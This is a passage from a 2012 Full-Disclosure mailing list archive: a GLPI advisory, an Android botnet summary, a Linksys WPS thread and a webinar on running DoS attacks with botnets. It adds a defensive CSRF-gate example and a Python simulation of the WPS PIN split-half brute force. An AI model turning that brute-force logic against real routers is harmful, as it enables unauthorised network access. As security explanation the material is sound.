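This D-Link advisory and the Zen-Cart advisory earlier on this page describe the same root cause: state-changing admin requests (a product delete via POST, a setflag or res_cmd via plain GET) that the device or application accepts on the strength of the session cookie alone, so a page on an attacker's site can issue them through the victim's logged-in browser. The Python below is an added example and not code from either vendor: a small request gate that binds a random token to each session, requires it on every state-changing request rather than only on "key operations" (the Zen-Cart post's proposed solution), compares it in constant time, and refuses to let GET requests change state at all, which is what defeats the img-src form of the attack. The action names are taken from the two advisories' URLs; the in-memory session store and the request dictionaries are constructed stand-ins for a real framework.

```python
import hmac
import secrets
from typing import Optional

# Constructed in-memory session store: session id -> per-session CSRF token.
# In a real application this lives in server-side session state, never in a URL.
_SESSIONS = {}

# Actions that change state; the names are the ones in the two advisories' URLs.
STATE_CHANGING = {"delete_product_confirm", "setflag", "res_cmd"}


def new_session() -> str:
    """Log an admin in and bind a fresh, unguessable CSRF token to the session."""
    sid = secrets.token_urlsafe(16)
    _SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def csrf_token_for(sid: str) -> str:
    """The token the server embeds in its own forms for this session."""
    return _SESSIONS[sid]


def authorize_request(method: str, action: str, sid: str,
                      token: Optional[str]) -> bool:
    """Gate one request: reads are free, writes need POST plus the session's token."""
    if sid not in _SESSIONS:
        return False                       # no valid session at all
    if action not in STATE_CHANGING:
        return True                        # read-only views need no token
    if method != "POST":
        return False                       # GET must never change state (img-src CSRF)
    if token is None:
        return False
    # Constant-time comparison, so a wrong token reveals nothing about the right one.
    return hmac.compare_digest(token.encode(), _SESSIONS[sid].encode())


def handle(request: dict) -> str:
    """Dispatch a constructed request dict and report whether it was applied."""
    ok = authorize_request(request.get("method", "GET"),
                           request.get("action", ""),
                           request.get("sid", ""),
                           request.get("securityToken"))
    return "applied" if ok else "rejected"


if __name__ == "__main__":
    sid = new_session()
    # The Zen-Cart PoC form: a POST whose securityToken "Can be anything".
    print(handle({"method": "POST", "action": "delete_product_confirm",
                  "sid": sid, "securityToken": "Can be anything"}))
    # The img-src / D-Link style: a bare GET riding on the session cookie.
    print(handle({"method": "GET", "action": "setflag", "sid": sid}))
    # The server's own form, carrying the token it issued.
    print(handle({"method": "POST", "action": "delete_product_confirm",
                  "sid": sid, "securityToken": csrf_token_for(sid)}))
```

Two details carry the weight here. The token must be tied to the session and never derivable from anything the attacker's page can read, otherwise "Can be anything" is literally true; and the method check must exist independently of the token check, because a device that performs reboots and configuration saves on GET has no place to put a token in the first place.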




[Full-disclosure] [Off-Spanish] Free webinar - DoS attacks in Latin America

2012-02-10 Thread runlvl
Date and time: Saturday, February 11 2012 - 18:00 (Argentina time, GMT-3:00)

In the webinar we will look, both in practice and in theory, at how
denial of service attacks are carried out,
and we will run tests against real environments proposed by the attendees
using botnets and exploits.

Speaker: Juan Sacco
Software used: Exploit Pack
Organizer: http://exploitpack.com

Registration link: http://www.anymeeting.com/PIID=EC50DD89874F

Duration: 1 hour

Regards
Juan Sacco



[Full-disclosure] New Android Malware Botnet Reversed/Uncovered

2012-02-10 Thread Adam Behnke
Hello, one of InfoSec Institute's security researchers reverse engineered a
new botnet that is active for the Android platform. RootSmart has some
unique features that make it newsworthy:

- Takes advantage of the Gingerbreak exploit to take control of the Android device
- The main malware payload is a rootkit that hides itself inside of a legit app
- The rootkit hooks itself into the legit app as a boot service
- The rootkit installs its own shell into the OS, allowing it to silently
install other packages
- Encrypts the C&C URLs with a clever non-standard communication stream

RootSmart is a successful botnet in the wild; between 10,000 and 30,000
devices are currently infected per Symantec. We were also able to uncover
the C&C server locations; they are currently active and residing in China.
More details are available here:

http://resources.infosecinstitute.com/rootsmart-android-malware/







[Full-disclosure] [ MDVSA-2012:016 ] glpi

2012-02-10 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:016
 http://www.mandriva.com/security/
 ___

 Package : glpi
 Date: February 10, 2012
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A File Inclusion vulnerability was discovered and corrected in
 GLPI. This advisory provides the latest version of GLPI (0.80.7)
 that is not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
 http://seclists.org/fulldisclosure/2012/Feb/157
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 14b099816fb703b7e9f83d51d5d93b7e  mes5/i586/glpi-0.80.7-0.1mdvmes5.2.noarch.rpm
 c6c175f0c94f1958634729eac1a1938b  mes5/SRPMS/glpi-0.80.7-0.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 6f7c10598a345e9dbb2b335f5af94174  mes5/x86_64/glpi-0.80.7-0.1mdvmes5.2.noarch.rpm
 c6c175f0c94f1958634729eac1a1938b  mes5/SRPMS/glpi-0.80.7-0.1mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFPNT2wmqjQ0CJFipgRAt8mAJ9XAlt4iCM/9L9IGi1g35NoCoU7dACfet8j
cWjfG0V0Fhnfg3PzsWytPaQ=
=eVYT
-END PGP SIGNATURE-



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Zach C.
Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse
problems? :))
On Feb 10, 2012 10:12 AM, Dan Kaminsky d...@doxpara.com wrote:

 Fixing a vulnerability like this with all the bureaucratic, QA and legal
 process wouldn't take no more than 2 weeks

 If bureaucratic, QA, and legal issues emerge, you can't even get the names
 of the people you need to speak to in less than 2 weeks, let alone schedule
 a conference call. Fixing?  Heh.

 Aside from rate limiting WPS, there isn't much of a fix, and you can't
 turn it off either.

 Sent from my iPhone

 On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote:

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
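To make concrete what this thread is arguing about (the "PIN registrar brute force" farthvader refers to, and Dan Kaminsky's remark that rate limiting is about the only fix), here is an added simulation. It is not code from this thread, from Reaver, or from any Linksys firmware. The simulated access point, the 1.5 seconds per attempt and the lockout parameters are assumptions made for the illustration; the PIN checksum digit and the fact that the two halves of the PIN are confirmed separately (after M4 and after M6) are the published protocol properties that make the attack cheap.

```python
from dataclasses import dataclass, field


def wps_pin_checksum(pin7: int) -> int:
    """Return the checksum (8th) digit for a 7-digit WPS PIN.

    This is the check digit the Wi-Fi Simple Configuration spec defines;
    12345670 is the textbook valid PIN.
    """
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin8: int) -> bool:
    """True if an 8-digit PIN carries the correct checksum digit."""
    return 0 <= pin8 <= 99_999_999 and wps_pin_checksum(pin8 // 10) == pin8 % 10


@dataclass
class SimulatedAP:
    """Constructed stand-in for a router answering external-registrar PIN attempts.

    Only the leak that makes the attack cheap is modelled: a wrong first half
    is rejected after message M4, a wrong second half only after M6, so the two
    halves can be guessed independently. Timing and lockout values are assumed
    parameters for this example, not measurements of any product.
    """
    pin: int
    seconds_per_attempt: float = 1.5   # assumed cost of one M1..M6 exchange
    lockout_after: int = 0             # 0 = no rate limiting, as the thread describes
    lockout_seconds: float = 60.0
    attempts: int = 0
    elapsed: float = 0.0
    consecutive_failures: int = field(default=0, repr=False)

    def attempt(self, pin8: int) -> str:
        """Answer one candidate PIN with 'M4-NACK', 'M6-NACK' or 'OK'."""
        self.attempts += 1
        self.elapsed += self.seconds_per_attempt
        if pin8 // 10_000 != self.pin // 10_000:
            result = "M4-NACK"
        elif pin8 % 10_000 != self.pin % 10_000:
            result = "M6-NACK"
        else:
            result = "OK"
        # Rate limiting (the only mitigation the thread credits): after
        # lockout_after consecutive failures the AP refuses WPS for a while.
        if self.lockout_after:
            self.consecutive_failures = 0 if result == "OK" else self.consecutive_failures + 1
            if self.consecutive_failures >= self.lockout_after:
                self.elapsed += self.lockout_seconds
                self.consecutive_failures = 0
        return result


def brute_force(ap: SimulatedAP) -> int:
    """Recover the PIN one half at a time and return it."""
    first = None
    # Phase 1: the first four digits. The second half does not matter yet,
    # so send 0000 for it. At most 10,000 attempts.
    for cand in range(10_000):
        result = ap.attempt(cand * 10_000)
        if result == "OK":
            return cand * 10_000
        if result == "M6-NACK":
            first = cand
            break
    if first is None:
        raise RuntimeError("AP rejected every first half")
    # Phase 2: the last four digits, of which the 8th is a checksum, so only
    # 1,000 candidates remain. At most 1,000 attempts.
    for last3 in range(1_000):
        pin7 = first * 1_000 + last3
        pin8 = pin7 * 10 + wps_pin_checksum(pin7)
        if ap.attempt(pin8) == "OK":
            return pin8
    raise RuntimeError("AP rejected every second half")


def estimate(pin: int, lockout_after: int = 0, lockout_seconds: float = 60.0) -> dict:
    """Run the attack against a simulated AP and report attempts and wall time."""
    ap = SimulatedAP(pin=pin, lockout_after=lockout_after, lockout_seconds=lockout_seconds)
    found = brute_force(ap)
    return {"found": found, "attempts": ap.attempts, "hours": round(ap.elapsed / 3600, 2)}


if __name__ == "__main__":
    print("valid 8-digit PINs if the halves could not be split:", 10 ** 7)
    print("worst case with split halves:", estimate(99_999_995))
    print("PIN 12345670, no rate limiting:", estimate(12_345_670))
    print("PIN 12345670, 60 s lockout after 3 failures:", estimate(12_345_670, lockout_after=3))
```

The point the numbers make: without the split, an attacker faces ten million checksum-valid PINs; with it, at most 11,000 attempts, which at the assumed 1.5 s each is under five hours even in the worst case. A lockout after a handful of failures stretches the same run by an order of magnitude, which is why rate limiting is the mitigation the thread keeps coming back to, and why it only raises the cost rather than closing the hole.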

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Dan Kaminsky
According to the Reaver people, DD-WRT doesn't support WPS at all :)

On Fri, Feb 10, 2012 at 2:00 PM, Zach C. fxc...@gmail.com wrote:

 Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse
 problems? :))

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread james
Waidaminnit... Didn't you try to sell me a Belkin the other day?

Conflict of interest there.
Sent from my BlackBerry® wireless device

-Original Message-
From: valdis.kletni...@vt.edu
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 10 Feb 2012 11:06:49 
To: farthva...@hush.ai
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Valdis . Kletnieks
On Fri, 10 Feb 2012 14:41:37 EST, Dan Kaminsky said:

 According to the Reaver people, DD-WRT doesn't support WPS at all :)

The sort of people that run DD-WRT probably consider that a feature, not a bug. ;)



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Dan Kaminsky
On Fri, Feb 10, 2012 at 4:33 PM, valdis.kletni...@vt.edu wrote:

 On Fri, 10 Feb 2012 14:41:37 EST, Dan Kaminsky said:

  According to the Reaver people, DD-WRT doesn't support WPS at all :)

 The sort of people that run DD-WRT probably consider that a feature, not a
 bug. ;)


If you've got the skill to install DD-WRT, you've got the skill to manually
set up WPA2.

Note, by the way, the core concept of WPS (that setup should be easy) was
absolutely correct, and we have hard data that it worked.

[Full-disclosure] [Announcement] ClubHack Mag - Call for Articles

2012-02-10 Thread Abhijeet Patil
Hello All,

ClubHack Magazine is seeking submissions for its next issue, Issue 26 - March
2012.

Topics:-
1. Web App Sec
2. OS Exploitation and Security
3. Cryptography and cryptanalysis

A few guidelines:
1) Keep the language as easy as possible. Screenshots will help.
2) Along with the article, send us your photograph and a short intro.
3) Submission due date: 27th of this month

Send in your articles to abhij...@clubhack.com

Regards,
Abhijeet Patil,
Co-Founder, CHMag
http://chmag.in